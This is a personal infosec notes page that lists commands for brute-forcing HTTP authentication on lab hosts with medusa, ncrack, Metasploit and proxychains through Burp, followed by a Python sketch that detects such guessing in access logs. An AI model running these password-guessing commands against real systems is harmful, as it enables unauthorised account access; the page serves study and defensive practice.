akde/infosec

Information security is ultimately about managing risk


With Medusa

Doesn’t seem to work with virtual hosts!

medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2

With ncrack

Doesn’t seem to work with virtual hosts!

ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/

With metasploit

Use module auxiliary/scanner/http/http_login

Virtual hosts

If Host headers are not supported:

  1. Start Burp proxy.
  2. Configure proxychains to use the Burp proxy.
  3. Prepend proxychains to the command so that the requests go through Burp. Example:
    • proxychains medusa -s -h docker.registry.htb -u registry -P /usr/share/wordlists/rockyou.txt -M http -m DIR:v2/_catalog -T 20
  4. In Burp, configure header modifications.
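
On the defending side, password guessing like the runs above shows up in the web server access log as a burst of 401 responses from one client against one path, sometimes followed by a 2xx. The following detection sketch is an added example, not part of the original notes; the log lines are constructed, the window and threshold are assumed tuning values, and it assumes a combined-format log whose user field records the supplied Basic-auth user name.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [time] "method path proto" status size ...
LINE = re.compile(r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                  r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
WINDOW = timedelta(seconds=60)  # assumed tuning value
THRESHOLD = 5                   # assumed: 401s per window, per client and path

def detect(lines, window=WINDOW, threshold=THRESHOLD):
    """Alert on a burst of 401s and on a 2xx that follows such a burst."""
    recent = defaultdict(list)  # (ip, path) -> timestamps of recent 401s
    flagged, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        key = (m["ip"], m["path"])
        if m["status"] == "401":
            # keep only failures inside the sliding window, then add this one
            recent[key] = [t for t in recent[key] if ts - t <= window] + [ts]
            if len(recent[key]) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", *key, m["user"]))
        elif m["status"].startswith("2") and key in flagged:
            # a success right after a burst: the password was probably guessed
            alerts.append(("success_after_bruteforce", *key, m["user"]))
            flagged.discard(key)
            recent.pop(key, None)
    return alerts

def _line(ip, user, sec, status):  # builds one constructed sample log line
    return (f'{ip} - {user} [10/Oct/2023:13:55:{sec:02d} +0000] '
            f'"GET /~Public/ HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: a normal login (one 401 challenge, then 200) and a guessing run
SAMPLE = [_line("198.51.100.7", "-", 0, 401), _line("198.51.100.7", "alice", 1, 200)]
SAMPLE += [_line("192.0.2.10", "bethany", s, 401) for s in range(10, 16)]
SAMPLE += [_line("192.0.2.10", "bethany", 16, 200)]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

The single 401 that a browser receives before it sends credentials stays below the threshold, so the normal login in the sample raises no alert.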

More

  • https://www.hackingarticles.in/multiple-ways-to-exploiting-http-authentication/


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
